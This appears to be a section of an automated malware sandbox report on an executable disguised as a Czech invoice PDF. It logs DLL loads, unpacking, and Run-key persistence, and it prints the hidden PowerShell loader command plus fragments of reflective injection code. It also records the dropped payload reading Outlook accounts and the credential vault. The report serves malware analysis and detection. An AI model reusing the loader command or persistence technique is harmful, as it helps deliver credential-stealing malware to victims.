Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Unpacked PE file: 28.2.Nubilum.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Unpacked PE file: 29.2.Nubilum.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Unpacked PE file: 30.2.Nubilum.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: Yara match File source: 00000002.00000002.1663936772.0000000008EC4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3672277359.0000000001BE4000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Brevaabnerens $Duvning $Affixion), (Thimblewit @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Leveringsdato = [AppDomain]::CurrentDomain.GetAssemblies()$g
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Furler)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Framboise, $false).DefineType($Occupations, $Vandl
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)"
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 28_2_004044A4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_048A1C3B push eax; iretd 2_2_048A1C49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_048A1C4B push eax; iretd 2_2_048A1C49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_075070A5 push 8B059A24h; iretd 2_2_075070AE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0750FA02 push es; ret 2_2_0750FA0F
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAB2806 push ecx; ret 16_2_1FAB2819
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0044693D push ecx; ret 28_2_0044694D
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0044DB70 push eax; ret 28_2_0044DB84
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0044DB70 push eax; ret 28_2_0044DBAC
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00451D54 push eax; ret 28_2_00451D61
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_0044B090 push eax; ret 29_2_0044B0A4
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_0044B090 push eax; ret 29_2_0044B0CC
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_00451D34 push eax; ret 29_2_00451D41
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_00444E71 push ecx; ret 29_2_00444E81
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00414060 push eax; ret 30_2_00414074
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00414060 push eax; ret 30_2_0041409C
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00414039 push ecx; ret 30_2_00414049
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_004164EB push 0000006Ah; retf 30_2_004165C4
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00416553 push 0000006Ah; retf 30_2_004165C4
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00416555 push 0000006Ah; retf 30_2_004165C4

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Nubilum.exe Jump to dropped file
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run husmndenes Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run husmndenes Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 29_2_004047CB
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
